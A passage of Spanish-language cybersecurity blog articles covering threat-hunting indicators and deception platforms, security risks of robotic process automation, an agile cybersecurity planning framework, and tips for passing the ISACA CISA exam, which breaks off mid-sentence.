cambiar a una nueva después de ser descubierto, pero es mucho más laborioso crear un nuevo conjunto de herramientas. Aquí es donde el asunto se pone interesante: estas herramientas son las que pueden mostrar cualidades únicas y proporcionar detalles que incluso podrían servir para identificar al actor. Además, todos tenemos nuestra propia forma de hacer las cosas; nuestros propios hábitos y patrones, que forman parte de nuestra identidad, como una huella. Y para un atacante, es difícil enmascarar este comportamiento humano inconsciente. ## ¿En quién podemos confiar? Antes de asumir que estos IOC son auténticos, debemos recordar con quién estamos tratando. Es común entre los profesionales de seguridad confiar ciegamente en la información compartida por la comunidad de caza de amenazas y los proveedores de inteligencia sin verificar que los IOC sean reales. La doble verificación implica probar las muestras para confirmar si son parte del malware o de las familias de herramientas a las que se cree que pertenecen, verificar que los dominios estuvieron activos durante el período de tiempo correspondiente, verificar que los metadatos recopilados de los IOC coincidan o verificar si la herramienta IOC se corresponde con el comportamiento de la herramienta en el escenario que se está investigando. No suena fácil, ¿verdad? Esto se debe a que este nivel de verificación de la IOC no lo es. En algunos casos, ni siquiera es posible volver a verificar toda la información. Somos afortunados por contar con el fantástico trabajo de la comunidad de Threat Hunting. ## Falsas banderas, el riesgo esperado Como bien hemos reconocido, no se debe creer en todos los IOC. Muchas veces pueden darse casos de falsa bandera: los ciberdelincuentes conocen las implicaciones que puede tener ser expuestos, por lo que no se arriesgan a que sus identidades sean descubiertas fácilmente. A menudo utilizan información conocida para intentar confundir a los investigadores y vincular su actividad con otros actores, con intención de protegerse. Por lo tanto, si los IOC se pueden manipular, y si algunos de ellos son falsas banderas, ¿son todos inútiles? No, de ningún modo. Se puede y se debe aplicar la misma lógica de resolución de problemas que hemos estado utilizando durante años. A menudo, los atacantes se apresuran a tener acceso a los sistemas cuanto antes para cumplir con determinados plazos, y al igual que el resto de nosotros, cometen errores. Es posible que no tengan recursos suficientes para tumbar toda su infraestructura o para crear un nuevo conjunto de herramientas. A su vez, puede que sencillamente no le presten suficiente atención. Hemos visto a actores veteranos empleando las mismas herramientas durante años, por lo que el curso de acción obvio debería ser que nosotros también utilicemos los IOC. ¿Por qué no emplear algo que es sencillo de verificar y que proporciona una clara indicación de que se está produciendo un ataque? ## Modelado de amenazas Consideremos el modelado de amenazas. Consiste en crear una abstracción del ataque, dividir el ataque en pasos lógicos y analizar las actividades realizadas por el atacante en tácticas, técnicas y procedimientos (TTP) de alto nivel en un intento por definir su modus operandi. Este proceso nos da una visión de alto nivel del ataque y, a menudo, proporciona una perspectiva diferente del mismo. Desde aquí, trabajamos para determinar cómo se comportan los atacantes. Es cierto que pueden perderse algunos detalles, por lo que el modelado de amenazas no debería considerarse un reemplazo de los IOC, sino ideas que lo complementan y mejoran. ## MITRE y mapeo de amenazas Se ha realizado una gran cantidad de investigaciones valiosas en este campo. Personalmente, el ATT&CK de MITRE nos gusta mucho y creemos que merece un gran reconocimiento por la labor realizada. Esta base de conocimiento permite ajustar técnicas de bajo nivel en TTP de más alto nivel; un tipo específico de mapeo que es particularmente difícil, porque algunas técnicas pueden encajar en más de un paso, y algunas pueden ser difíciles de encajar en alguno. Este mapeo de amenazas puede ayudar a identificar el comportamiento típico de un actor y ver la actividad de un atacante mientras compromete una red o unos dispositivos. Como resultado, podemos intuir si el ataque aún se encuentra en sus primeras etapas y, posiblemente, lo que el atacante quiere lograr. Mapear los modelos de amenaza es complicado. Los modelos de amenazas de atacantes pueden ser bastante genéricos, lo que puede ser algo bueno, pero también pueden arrojar un gran número de falsos positivos. Sin embargo, si el modelo de amenaza es complejo y completo e incluye información de varios ataques, es probable que un nuevo ataque no exponga todas las técnicas incluidas en él. En la mayoría de los casos, es poco probable que se pueda identificar a un actor en las primeras etapas de un ataque, pero esta información puede indicar los próximos pasos de un atacante o ayudar a determinar a qué tipo de actor nos enfrentamos. ## Recopilando información: posibilidades y desafíos Para terminar, centrémonos en cómo recopilamos esta información. No estoy hablando de compartir información dentro de la comunidad de caza de amenazas, sino sobre cómo obtenemos esta información en primer lugar. ¿Cómo se extraen los IOC y los TTP? ¿Tenemos suficiente visibilidad del actor para afirmar que descubrimos su modus operandi? ¿Es ese modus operandi que caracteriza al actor, o es el modus operandi utilizado solamente en el ataque analizado? ¿Estamos seguros de que cubrimos todas sus técnicas en el MO? Esta es la parte realmente complicada. El análisis de incidentes desempeña un papel clave a la hora de proveer de información sobre el modus operandi del atacante, sus herramientas, etc., pero no garantiza una visibilidad completa del ataque. Una posible opción es intentar investigar y monitorizar la actividad delincuentes, algo que conlleva sus propios desafíos y que a veces está limitado por la ética del investigador o la posibilidad de detectar cualquier servidor malicioso y no tener manera de obtener la información almacenada en él. Una vez que tengamos alguna evidencia con la que trabajar, la gran, compleja y oscura capa entre nosotros y los ciberatacantes, también conocida como Internet, dificulta el seguimiento de la actividad de los mismos. ## Preparado para ser comprometido Otra opción es preparar un sistema completo listo para ser comprometido. Esto es algo que hacemos utilizando CounterCraft Cyber Deception Platform. Desarrollamos un entorno con puntos débiles realistas en cuanto a seguridad para atraer a los ciberatacantes y engañarlos, haciéndoles creer que se han encontrado con una red lo suficientemente interesante como para entrar en ella. Tú controlas el entorno; tú lo supervisas y puedes expandirlo sobre la marcha si lo deseas. Una plataforma de deception también te brinda la opción de centrarte en actores específicos, aprovechar su metodología de ataque y ejecutar un documento malicioso o malware perteneciente a una campaña en curso dentro de tu sistema. No se trata por tanto de desplegar una máquina vulnerable y esperar que algo suceda. Se trata de tener un sistema completo y realista habilitado que atraiga a un atacante para que puedas reunir inteligencia sobre él y el ataque mientras el sistema está siendo comprometido. > Nadie dijo que fuera fácil. ¡No lo es! Pero estamos dispuesto a jugar este juego. - Mikel Gastesi, Senior Threat Analyst en CounterCraft Nos llevaría mucho más tiempo del que tenemos hoy en día para explorar todo el espectro de la caza de amenazas, y mañana esa información se habrá quedado obsoleta. Una cosa de la que podemos estar seguros es que no hay una solución única para ganar esta guerra. No existe una plataforma de detección o tecnología perfecta para abordar la multitud de desafíos que presentan las ciberamenazas. Sin embargo, las herramientas y el conocimiento que tenemos son lo bastante maduros como para permitirnos identificar conjuntos de datos únicos y patrones sospechosos que nos permitan fortalecer con éxito nuestras defensas y proteger nuestros sistemas. --- # 10 riesgos de seguridad en Robotics Process Automation (RPA) URL: https://ciberseguridad.blog/10-riesgos-de-seguridad-en-robotics-process-automation-rpa/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-02-09 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > La adopción de nuevas tecnologías como Robotic Process Automation (RPA), traen consigo una serie de riesgos de ciberseguridad asociados ¡ CONÓCELOS ! Robotic Process Automation (RPA) es una tecnología emergente utilizada para realizar operaciones rutinarias a través del Interfaz Gráfica de Usuario (GUI) de una manera similar a como lo haría un trabajador humano. En la forma más básica, los RPA representan un paso más en el desarrollo de scripts "incrustados" en las aplicaciones, con la salvedad de que los RPA, se ejecutan en su propia plataforma y permiten actividades entre aplicaciones. Por supuesto, el mismo resultado se puede lograr mediante el uso de interfaces de programación de aplicaciones (API), sin embargo, en la mayoría de los casos, el software legacy utilizado en gran parte de las empresas, no dispone de APIs. Los RPA permiten abordar dicha necesidad de una forma más rápida y a un menor coste en comparación con la migración de dichos sistemas legacy a nuevos sistemas. Todo ello, teniendo en cuenta, que el principal beneficio de la implementación de RPA es la reducción de los gastos operativos debido al reemplazo de trabajos humanos, normalmente de un carácter repetitivo y tedioso. [Imagen: Gráfico de barras del crecimiento de ingresos en software y servicios RPA de 2016 a 2021] Los RPA están en una etapa temprana de adopción, por lo que es crucial para las empresas establecer un marco adecuado para la implementación de RPA , gestionando por adelantado lo riesgos en los que podría derivar. De no gestionar dichos riesgos, podrían producirse incidentes de seguridad, interrupciones en la continuidad del negocio o la imposibilidad de introducir controles adecuados en una etapa posterior debido a la complejidad de los entornos RPA. En general, los RPA son bastante similares a la computación final, siendo el enfoque más razonable la reutilización de un framework de control. Alternativamente, podemos usar controles diseñados para aplicaciones desarrolladas internamente. La principal diferencia entre los RPA y las aplicaciones en la administración de la gestión de identidad (IAM), es que las instancias de RPA se deben comportan como un usuario individual. Si se tienen controles eficientes desarrollados e implementados, tanto para componentes de software como para Gestión de Identidad, también es relativamente fácil crear un entorno bien controlado para la tecnología RPA. Por otro lado, los RPA cognitivos tienen un panorama de amenazas totalmente diferentes, cuyo problema, está mal abordado incluso desde las normas internacionales de seguridad de la información. Las compañías enfrentan problemas como la "confiabilidad" de los algoritmos de aprendizaje automático con una alta probabilidad de introducir cambios irrelevantes en los algoritmos y cambios irracionales en la lógica de toma de decisiones.Estos desafíos requieren la creación de un nuevo framework de control basado en las mejores prácticas internas, la colaboración con otras compañías y consultores expertos en la materia. [Imagen: Diagrama de madurez de RPA con robots desde asistentes personales hasta innovación] Es por ello, que se plantean varios riesgos de seguridad asociados a los RPA: 1. Gobernabilidad deficiente de RPA 2. Implementación ineficiente de RPA 3. Mala implementación de la Gestión de Identidad 4. Falta de preparación en la continuidad de negocio 5. Gestión inadecuada de cambios 6. Falta de gestión vulnerabilidades 7. Inconsistencia de los resultados RPA 8. Incumplimiento normativo 9. Daños de reputación 10. Protección de datos insuficiente ## Gobernabilidad deficiente de RPA La lucha contra Shadow IT en las empresas, es continua, debido a que no se pueden descubrir los activos correctamente debido a la falta de recursos. Además, hay una gran cantidad de aplicaciones legacy, difíciles de administrar, mantener y proteger. Los RPA se conciben de una manera que facilita su creación, incluso para el personal que no es de TI. Si no se construyen controles alrededor de dicha tecnología, la organización se enfrentará a una gran cantidad de RPAs creados en un corto período de tiempo, lo que se traducirá en riesgos operativos significativos. Por lo tanto, las ganancias a corto plazo de la propagación inicial de RPA a lo largo de un período de tiempo más largo podrían resultar en pérdidas significativas y una mayor expansión de Shadow IT en la empresa. ## Implementación ineficiente de RPA Uno de los beneficios derivados de la introducción de RPA, es la posibilidad de reducir los gastos al disminuir la cantidad de FTE necesarios para respaldar el proceso recientemente automatizado. Obviamente, es un gran objetivo para la empresa, pero es difícil esperar que todos los empleados se alegren por ello, especialmente si su puesto de trabajo pudiese eliminarse. Es por ello que se puede crear un conflicto de intereses si las funciones relacionadas con la implementación de RPA no se asigna correctamente. Tambien pueden aparecer problemas adicionalessi no hay priorizaciones para los proyectos RPA existe, o si el personal involucrado en el proyecto no tiene los conocimientos relevantes sobre la tecnología y sus beneficiosos. ## Mala implementación de la Gestión de Identidad Hay algunas formas sencillas de administrar las credenciales RPA, como hacer que los robots trabajen con las cuentas de los empleados o mediante un usuario técnico compartido (que personalmente no recomendaría para ciertos procesos automatizados). Dejando claro que alguna de estas prácticas están lejos de ser la mejor opción desde el punto de vista de la ciberseguridad. La incapacidad de establecer prácticas IAM unificadas, seguras y eficientes para los RPA resultará en una carga operativa, brindará oportunidades para el fraude interno, provocará el incumplimiento de los requisitos de segregación de funciones (SoD) y aumentará la probabilidad de ciberataques. ## Falta de preparación en la continuidad de negocio Una vez implantados, los RPA pueden convertirse en un único punto de fallo para el proceso de negocio. Dicha tecnología, si no está cubierto adecuadamente por un programa de continuidad comercial, el fallo en un solo robot de software podría provocar una situación de crisis en la empresa. Una amenaza adicional para la estabilidad de la infraestructura de la empresa es la dependencia del software utilizado para RPA. Un error en una actualización del software RPA o la quiebra del proveedor puede llevar a consecuencias fatales, si la mayoría de los RPA dejan de funcionar. Como se ha comentado anteriormente, uno de los mejores usos de RPA es abordar el diseño deficiente de los sistemas legacy, esto, podría ser un arma de doble filo, ya que podría posponer la migración de sistemas. ## Gestión inadecuada de cambios Los RPA como un "activo adicional" deben estar representados en el proceso y los procedimientos de gestión de cambios. El no hacerlo, junto con la ausencia de dependencias documentadas de RPA en otros componentes de software, terminará en la falta de disponibilidad del servicio y/o errores en el procesamiento. Pero esto es aún más complicado con los RPA cognitivos, ya que requieren un enfoque específico para cambiar la administración como cualquier otro algoritmo de aprendizaje automático. El propio código y los cambios de algoritmo introducidos al procesar nuevos conjuntos de datos representan en sí , un punto adicional de fallo. ## Falta de gestión vulnerabilidades Tanto el software RPA como las instancias RPA representan una superficie de amenazas adicional. Teniendo en cuenta la rápida adopción de la tecnología de robots, es fácil predecir que representará una concentración significativa de riesgos para las empresas en el futuro. Conduciendo esto, eventualmente a un aumento en la demanda de gestión de vulnerabilidades debido a que los RPA serán un objetivo muy deseado para los hackers. La administración de contraseñas para los RPA son otro tema a discutir, tratándolo aquí, pero que podríamos alinear con la Gestión de Identidad anterior. Si las mismas no se administra adecuadamente de acuerdo con los requisitos de políticas de la empresa, esta deficiencia brindará oportunidades de fraude interno y permitiría a los piratas informáticos implementar ataques en una amplia gama de procesos una vez que se comprometiese la red. ## Inconsistencia de los resultados RPA Hay muchos problemas que pueden llevar a que se produzcan errores en los datos como resultado de la ejecución automatizada de procesos por parte de los RPA. Éstos son algunos de ellos: - Errores de configuración / errores presentes en RPA - Cambio impredecible en el modelo RPA cognitivo - Incapacidad del algoritmo RPA para manejar una excepción Por lo tanto, la falta de un entorno de preproducción adecuada y/o pruebas periódicas, en algún momento, resultará en una pérdida de integridad de datos. También podría producirse una pérdida de integridad de los datos si las tareas que anteriormente realizaban los humanos, son asignados a RPA en su lugar. ## Incumplimiento normativo Cuando se trata de innovación, existe una gran incertidumbre en los marcos regulatorios. La incapacidad para explicar los resultados finales producidos por RPA a los reguladores, pueden dar lugar a sanciones debido a la falta de "demostrabilidad". La provisión de evidenciar un vínculo formal entre la acción realizada por un RPA y un empleado designado como responsable, puede dar a problemas de auditoria e incumplimientos normativos. ## Daños de reputación Los algoritmos de aprendizaje automático pueden recoger patrones o tomar decisiones que podrían ser inaceptables desde un punto de vista ético. Este punto es especialmente crítico para empresas multinacionales. El manejo de la diversidad cultural podría ser difícil, incluso si se introducen pruebas de control para dichos problemas éticos. Además de esto, los riesgos de reputación pueden aparecer en ciertas circunstancias. Como caso famoso de ello a hacer referencia, fue cuando el algoritmo de Uber elevó los precios de las tarifas significativamente durante actos terroristas en Londres, resultando en un gran escándalo mediático para la compañía. ## Protección de datos insuficiente La velocidad y la escalabilidad de RPA se debe considerar cuando las actividades relacionadas con el procesamiento de datos confidenciales se automatizan. En caso de ejecución manual, existe la posibilidad de que se detecten errores durante el proceso, sin embargo, con RPA no se espera que se generen alertas. El incumplimiento de la confidencialidad en algunos casos puede tener un impacto significativo en los negocios y se deben incorporar controles adicionales en el flujo de trabajo para mitigar los riesgos. ## Recomendaciones a la hora de implentar RPA - Establecer un grupo de trabajo dedicado para definir el alcance, procesos para la priorización de implementación de RPA, limitaciones regulatorias y marco de evaluación de riesgo empresarial. - Asegurar que los empleados asignados a la implementación de RPA no tengan conflictos de interes. - Decidir si el desarrollo RPA se subcontratará o si se realizará mediante recursos internos dedicados. - Estudiar si la empresa esta lista para introducir RPA cognitivo, o si el alcance de la implementación se limitará únicamente a robots de software RPA asistidos/no asistidos. - Establecer un servicio de arquitectura de seguridad para la tecnología RPA. - Ajustar las políticas del Sistema de gestión de la seguridad de la información (SGSI) para incorporar la tecnología y los procesos RPA. - Asegurar estándares tecnológicos alineados con los requisitos RPA. - Actualizar los framework de control de IS/IT y de gestión de riesgos para reflejar los cambios en las Políticas y Normas que se relacionan con RPA. --- # Ciberseguridad ágil con Agile Cybersecurity Action Planning (ACAP) URL: https://ciberseguridad.blog/ciberseguridad-agil-con-agile-cybersecurity-action-planning-acap/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-02-03 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Los framework agile en ciberseguridad, son una necesidad. Podríamos estar ante uno de los sectores más rápidamente cambiantes ¡ BE AGILE ! La ciberseguridad está operando en un entorno de imprevisibilidad, cambio de tecnología acelerado y una alta complejidad de amenazas. Con demasiada frecuencia, las respuestas a los ataque de ciberseguridad se basan en metodologías antiguas, engorrosas y lentas basadas en elementos críticos para dar una respuesta a dichos ataque de forma exitosa. Para enfrentarse a las amenazas de ciberseguridad emergentes, las estrategias de protección de la ciberseguridad deben ser holísticas, ágiles y adaptables. La cultura organizativa de los departamentos de ciberseguridad debe ser lo suficientemente resistente como para trabajar con una estrategia flexible e inteligente con el fin de contrarrestar el entorno inevitablemente cambiante en el que nos encontramos. Con el simple hecho de los procesos actuales orientado al cumplimiento normativo y legislativo, se provoca que las organizaciones de ciberseguridad no puedan adaptarse a las condiciones cambiantes y emergentes nuevas. La solución, el Agile Cybersecurity Action Planning (ACAP), o plan de acción de ciberseguridad, que integra una fusión de ideas de Metodologías Agile, Planificación estratégica adaptativa, Mejora de procesos y Gestión de amenazas / riesgos, con las mejores prácticas de ciberseguridad. ACAP sienta las bases para una “Cultura organizativa de seguridad cibernética adaptativa” para adaptarnos con éxito a los desafíos complejos que surgen continuamente. La seguridad cibernética de hoy en día está impulsada principalmente por un "modelo de castillo" de defensa, centrado en la creación de un modelo relativamente estático de defensas de ciberseguridad de "puertas cerradas" mediante firewalls, monitorización de aplicaciones y procesos rígidos con la esperanza de que, con algunas modificaciones y soluciones, estas protecciones se mantengan y las listas de verificación de cumplimiento detallan las "puertas que deben estar cerradas con llave". Aunque son útiles, estas check lists de verificación pueden producir cierto nivel de seguridad y cierta ilusión de integridad de seguridad. El enfoque de la cultura de ciberseguridad es informar sobre la lista de verificación y no mirar hacia el futuro a sus amenazas emergentes. La ciberseguridad no debería consistir simplemente en construir "mejores castillos", sino en anticiparse a las amenazas emergentes. Los castillos se deshicieron mediante la introducción de cañones . Esto probablemente podemos aplicarlo a la ciberseguridad donde los "bárbaros", ya sean locales o no extranjeros, criminales o hacktivistas, buscan constantemente nuevas tecnologías, la debilidad humana, puertas traseras u otras debilidades en el castillo de forma contínua. Los ciberatacantes son inquietantemente creativos y rápidos en la adopción de nuevas tecnologías, ya que no tienen las mismas limitaciones regulatorias que de nuestro lado. Son adaptables en el uso de la ingeniería social para obtener acceso, tan diferentes en sus métodos como en sus orígenes, todos ellos, en constante evolución. El Plan de acción de ciberseguridad ágil (ACAP) es un enfoque nuevo, dinámico y holístico para alinear rápidamente la estrategia de ciberseguridad de la organización, la capacidad técnica y organizativa, los procesos y las políticas para abordar el universo de amenazas y riesgos cibernéticos de hoy en día. [Imagen: Diagrama de flujo del método ACAP con etapas de la 5.1 a la 5.9] ACAP se enfoca en crear una estrategia de solución iterativa del 90% (o mejor) para el entorno actual y continuamente cambiante de Ciberamenazas y Riesgos. El proceso ACAP utiliza una sofisticada fusión paradójica de conceptos específicos de varios campos: - Gestión de riesgos - Planificación estratégica adaptativa - Mejora de procesos - Métodología Agile - Buenas Prácticas de Ciberseguridad - Colaboración creativa ACAP se enfoca en cambiar la estrategia y la cultura de ciberseguridad de la organización, ya que con demasiada frecuencia están estrechamente "orientadas al cumplimiento" y apenas son capaces de administrar el anterior tempo de amenaza, a un enfoque que se adapta a los riesgos y amenazas emergentes sobre una base iterativa y rápida. El corazón del Proceso ACAP es un taller de estrategia de amenaza / riesgo en el que un equipo técnico y de liderazgo de múltiples niveles y funciones cruzadas comparte información y toma decisiones para: 1. Crear un perfil de amenaza / riesgo en continua evolución 2. Reevaluar rápidamente la infraestructura de ciberseguridad de la organización para la efectividad y la capacidad de adaptación: Tecnología / Procesos / Planes de monitización y respuesta ante incidentes, capacidades del personal y políticas contra el perfil de riesgo / riesgo inmediato y a futuro. 3. Identificar los deltas / problemas sistémicos antes de que ocurran. 4. Crear un plan de acción para remediar los deltas / problemas a través de cambios en las políticas de ciberseguridad y actualizaciones de estrategias, personal, procesos y tecnología. El proceso de ACAP se repite en ciclos de 1 a 6 meses, al igual que el proceso de "Sprints" de Agile Development o "según sea necesario", o según la "tecnología de amenaza" emergente. Por ejemplo, si hay una nueva generación de amenazas, la dirección podría iniciar una sesión de ACAP para actualizar la matriz de amenazas / riesgos y realizar los cambios técnicos o de proceso necesarios antes de que se de la nueva amenaza. ACAP es un enfoque adaptativo no enfocado a la perfección a largo plazo, sino en llegar a “lo suficientemente bueno, por ahora. "Lejos de evitar la disensión, el proceso ACAP aprovecha lo que Dorothy Leonard denomina la " abrasión creativa ". ACAP reconoce el poder de las inteligencias múltiples y las perspectivas para abordar los problemas de manera cooperativa. El proceso ACAP se itera y actualiza con estrategias de adaptación y escenarios alternativos para mejorar el éxito de la respuesta ante incidentes. El valor de ACAP es crear una cultura donde se valore la previsión y el intercambio de conocimientos, la estrategia de ciberseguridad se considere provisional, la adaptación a las amenazas y riesgos cambiantes es primordial, enfocado en la rápida implementación . Debido a que ACAP es “independiente del marco”, el proceso de ACAP se puede adaptar para trabajar fácilmente con una amplia gama de modelos y procesos existentes y emergentes , como es el conocido ITIL o similares. ACAP puede utilizar cualquier seguridad controlando los estándares que la organización desee cambiar. No es necesario que exista ningún conflicto con los requisitos de cumplimiento para crear una linea estratégia de ciberseguridad. ## Conclusión El proceso ACAP produce una agilidad estratégica en el personal, los procesos, las políticas y la tecnología de seguridad necesarias para responder a un entorno de ciberamenazas rápidamente cambiantes. Pero lo que es más importante, el proceso moverá la cultura de la ciberseguridad hacia una mayor velocidad y capacidad de adaptación a un entorno de ciberseguridad turbulento y difícil de predecir. Conoce más sobre el framework ACAP --- # 14 Consejos o recomendaciones para aprobar el examen CISA de ISACA URL: https://ciberseguridad.blog/14-consejos-o-recomendaciones-para-aprobar-el-examen-cisa/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-01-26 Actualizado: 2026-10-04 Tema: Curso y Master en Ciberseguridad > La certificación CISA es una certificación para auditores respaldada y reconocida dentro de la Seguridad TI. Descubre estos Tips y certifícate. ¡ ÁNIMO ! Más de un mes llevaba sin actualizar el blog, pero hoy os puedo decir, que por una buena causa, y es que he aprobado la certificación CISA . Como sus siglas indican, Certified Information Systems Auditor (CISA) es una certificación para auditores respaldada por la Asociación de Control y Auditoría de Sistemas de Información. La certificación CISA es reconocida en todo el mundo como un estándar para los profesionales de sistemas de negocio y tecnología de la información que auditan, supervisan, acceden y controlan los datos. Ser certificado por CISA ayuda a los recluiter de RRHH a identificar candidatos con experiencia profesional, conocimientos y habilidades, incluida la experiencia en el manejo de vulnerabilidades, el control institucional y la garantía de cumplimiento. [Imagen: Insignias circulares de las certificaciones CISA, CRISC, CISM y CGEIT de ISACA] ## Cómo de dificil es el CISA La certificación CISA, consta de 5 módulos, de los cuales, en base a la experiencia profesional (Hay que recordar que ISACA para darnos la certificación, nos exige 5 años de experiencia) , puede llegar a costarnos más o menos, siempre teniendo en cuenta la propia metodología de la Asociación de Control y Auditoría de Sistemas de Información. ### Módulo 1 - El proceso de auditoría de los sistemas de información. Esto ayuda al candidato a obtener el conocimiento requerido para cumplir con los estándares más altos de los sistemas de información y proporcionar las mejores prácticas de auditoría. Para las organizaciones, esto significaría un control y protección completos de sus sistemas de negocios e información. ### Módulo 2 - El papel de CISA en el gobierno TI Los temas que se cubren en el Módulo 2 ayudan a desarrollar prácticas de control y mecanismos de gestión de IS (Information Sistem). Las organizaciones se benefician de profesionales certificados que brindarán la garantía de las mejores prácticas, incluidas las políticas, la responsabilidad y las estructuras de monitorización, para llegar al gobierno TI deseado. ### Módulo 3 - El papel de CISA en la gestión del ciclo de vida de los sistemas e infraestructura Este módulo cubre los procesos y metodologías que emplean las organizaciones modernas al cambiar o reinventar los componentes de infraestructura de sus sistemas de aplicación. Al igual que el material cubierto en los otros temas, este módulo prepara para el mundo real. ### Módulo 4: La función de CISA en la prestación de servicios de TI y el soporte En este módulo, se debe revisar los procesos y las metodologías aplicables a los diferentes sistemas TI. Además, brindará información sobre la auditoría IS en caso de una interrupción. Las empresas pueden ganar contratando candidatos certificados que puedan implementar metodologías de recuperación de desastres y la reanudación oportuna de los servicios de base de datos, minimizando así el impacto negativo en una variedad de procesos empresariales. ### Módulo 5 - El papel de CISA en la protección de los activos de información El componente clave del Módulo 5 permite que un profesional pueda garantizar la integridad, la disponibilidad y la confidencialidad de los activos de información mientras instituye controles de acceso lógicos y físicos y otras medidas de seguridad. ## Elegibilidad del CISA La Asociación de Auditoría y Control de Sistemas de Información (ISACA) requiere criterios profesionales y académicos estrictos para los candidatos que deseen solicitar la certificación CISA. Los criterios profesionales requieren que los candidatos tengan un mínimo de 4,000 horas reales de experiencia laboral en puestos de tiempo completo en sistemas de información, experiencia en seguridad y controles. Sin embargo, los candidatos pueden sustituir un máximo de 1 año de experiencia en auditoría, seguridad y control con un año de experiencia a tiempo completo en sistemas de información o auditoría. Para los instructores universitarios, un año de la experiencia requerida de auditoría, seguridad y control también se puede sustituir con dos años de experiencia completa como educador. ### Perfiles de trabajo esperados La principal descripción de trabajo de un auditor de tecnología de la información es ver que no haya situaciones de fraude, gastos innecesarios o incumplimiento de las leyes gubernamentales y regulaciones federales, así como analizar y preparar informes para la administración. Es probable que los titulares de certificados CISA sean contratados para roles como: - Auditor interno - Auditor Contable Público - Analista de Seguridad de la Información - Ingeniero de Seguridad en Operaciones de Red - Gerente de Auditoría de TI - Profesional de la ciberseguridad - Gerente de Riesgos y Aseguramiento de TI - Consultoría TI - Oficial de privacidad - Especialista en Seguridad PCI ## ¿ Por qué CISA ? Según ISACA, hay una enorme brecha de habilidades en el mercado. El número de ofertas de trabajo de ciberseguridad supera con creces el número de candidatos calificados que pueden cumplir estos roles. ¿Por qué uno de ellos no podrías ser tú? Las empresas necesitan profesionales de auditoría que tengan habilidades de auditoría, control y seguridad en Sistemas de la Información. Y es ahí donde la certificación CISA demuestra que tienes todas las habilidades necesarias para asumir un rol de seguridad de SI. ## ¿Qué hace que el examen CISA sea tan difícil? Como uno de los exámenes más difíciles en el dominio de seguridad de TI, el examen CISA es famoso por ser difícil de aprobar y por tener una tasa de aprobación baja. Aunque ISACA, el organismo que administra el examen, ha dejado de publicar información sobre las tasas de aprobación en los últimos años, los comentarios de los candidatos CISA exitosos y no exitosos sugieren que la tasa de aprobación está en el rango de 40 a 50%. Pero la pregunta sigue siendo: ¿Por qué el examen CISA es difícil de pasar? Algunas razones: Para mi, una razón importante, es, lo largo y pesado que se hace le examen (150 preguntas, por cierto, muy largas, de leer hasta 3 veces para entender), que a mí, hicieron que de las cuatro horas que dura el examen, me sobrasen 10 minutos. Las preguntas en el examen CISA a menudo son ambiguas y subjetivas, y muchos candidatos se quejan de las preguntas de la muestra ofrecidas por ISACA son vagas y no son relevantes para las normas en el examen real. Por otro lado, buscando información anterior al examen, me encontré que una queja común es que las preguntas sobre el examen CISA implican el recuerdo de la nomenclatura y la terminología del programa de seguridad TI, que hace que en algunos casos sea complicado, si dichas siglas no estas familiarizado con ellas. ## ¿Por qué es mayor la tasa de fracaso en el examen CISA en comparación con otras certificaciones de Sistemas de la Información? Si bien el examen es menos difícil de lo que comúnmente se percibe, miles de candidatos no logran aprobar el examen en el primer intento. Los expertos señalan varias razones para esto: - Los estudiantes con antecedentes técnicos o tecnológicos a menudo lidian con los conceptos de gobierno y auditoría. Si bien los conocimientos técnicos son importantes, la capacidad de auditar y administrar los procesos de seguridad TI es una necesidad para el examen CISA. - En el otro extremo del espectro, los aspirantes con antecedentes en auditoría y contabilidad son excelentes en estas áreas, pero luchan con los aspectos técnicos del examen. Los estudiantes de tales orígenes necesitarían entender los conceptos y objetivos centrales del currículo. - Muchos estudiantes experimentados insisten en seguir su propio enfoque para abordar preguntas y escenarios difíciles en el examen CISA, evitando el enfoque estándar prescrito por ISACA. ## 14 Tips para prepararse el examen CISA ### 1. Estudia el CRM religiosamente ISACA ofrece el Manual de Revisión de CISA (CRM), una guía única para el examen CISA. Es una referencia completa diseñada para preparar candidatos para el examen CISA. Proporciona todos los detalles relacionados con el examen CISA, así como la definición de los roles y responsabilidades de un auditor de sistemas de información. En general, este manual es la mejor guía de autoaprendizaje para los aspirantes a CISA. ### 2. Revisar la base de datos de preguntas de revisión CISA Practicar preguntas de revisión a fondo es obligatorio para este examen. La base de datos de preguntas de revisión de ISACA es un recurso integral de preguntas de práctica, respuestas y explicaciones. En mi caso, me lo prepare con el CD de preguntas de CISA, un imprescindible recurso capaz de adaptarte el estudio. ### 3. Piensa como un auditor La naturaleza del examen exige que los aspirantes piensen como un auditor de TI, no como examinados: porque el énfasis está en las aplicaciones del mundo real, afinando sus habilidades de toma de decisiones al abordar escenarios de problemas hipotéticos y aprender a manejar, Evaluar y priorizar múltiples tareas bien te ayudará a aprobar el examen CISA. ### 4. Aproveche los recursos gratuitos de ISACA El sitio web de ISACA ofrece una gran colección de recursos útiles y gratuitos para profesionales que se preparan para el examen CISA. Aquí hay enlaces a unos pocos: - Guía de auditoría y garantía de seguridad de la información - Guía de información del candidato de ISACA - Prueba de autoevaluación CISA de ISACA - ISACA's base de datos de libros blancos de descarga gratuita ### 5. Coloca blogs y artículos de CISA en tu lista de lectura. Además de los CD de CRM y CISA, los candidatos también deben visitar otros blogs (Además de el mejor blog de seguridad) y artículos de CISA disponibles para obtener una mejor perspectiva de la preparación del examen. Además de compartir información invaluable del mundo de la Seguridad que puede ayudar a los aspirantes a abordar las preguntas de CISA de las áreas de conocimiento actualizadas recientemente, los blogs mantenidos por contribuyentes regulares también son plataformas de gran aporte siempre. Algunos grandes blogs para prepararte la certificación CISA: - Blogs de ISACA : ¡ Para obtener información, consejos y trucos de la fuente! - Risk3Sixty : Mantenido por un par de auditores de TI con amplia experiencia, Risk3Sixty está dirigido a profesionales que trabajan en el espacio de Auditoría de seguridad TI. El blog cubre varios problemas y desafíos cotidianos que puede enfrentar como auditor CISA certificado, por lo que ayudará a adaptarse a la mentalidad de auditoría. ### 6. Experiencia práctica en auditoría de Sistemas de la Información Hará que la experiencia de certificación CISA sea más simple al obtener experiencia práctica y práctica en Seguridad de TI. Aunque son similares a las auditorías financieras y de recursos, las auditorías de TI tienen un alcance muy diferente, y tratan principalmente con información. Los aspirantes a CISA deben tener una idea clara de los procesos de negocios, la definición del alcance de la auditoría, la planificación de la auditoría y la presentación de informes. ### 7. Planificar y preparar con antelación La gestión de las 